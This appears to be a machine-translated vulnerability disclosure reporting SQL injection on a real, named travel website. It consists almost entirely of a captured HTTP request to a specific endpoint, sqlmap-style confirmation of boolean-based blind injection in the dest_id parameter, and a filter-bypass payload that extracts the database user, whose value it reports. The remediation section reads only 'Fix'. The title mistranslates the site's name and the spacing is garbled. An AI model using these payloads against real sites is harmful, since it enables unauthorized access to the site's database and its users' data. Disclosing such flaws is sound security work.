Alimama travel website has SQL Injection
(⊙ O ⊙ )...
If a problem occurs at a point, check whether there are any problems with all similar points .... POST/lvyou/dest_index/AjaxGetTripList HTTP/1.1Content-Length: 66Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.lvmama.com/lvyou/Cookie: uid = wKgKcFZNZmCynk9 + CC/NAg ==; lvsessionid = ca316cb1-37b6-41aa-af9a-5db2150f34c7_14207119Host: www. lvmama. comConnection: Keep-aliveAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) chrome/28.0.1500.63 Safari/537.36 Accept: */* dest_id = 2 & page = 3 & sort_field = time
--- Parameter: dest_id (POST) Type: boolean-based blind Title: AND boolean-based blind-WHERE or HAVING clause Payload: dest_id = 2 AND 1647 = 1647 & page = 3 & sort_field = time --- web application technology: PHP 5.5.20back-end DBMS: MySQL 5 was filtered. Directly bypass. Payload: dest_id = 2 and ascii (mid (lower (user () from (1) for (1) = 108 current user: '[email protected]'
Solution:
Fix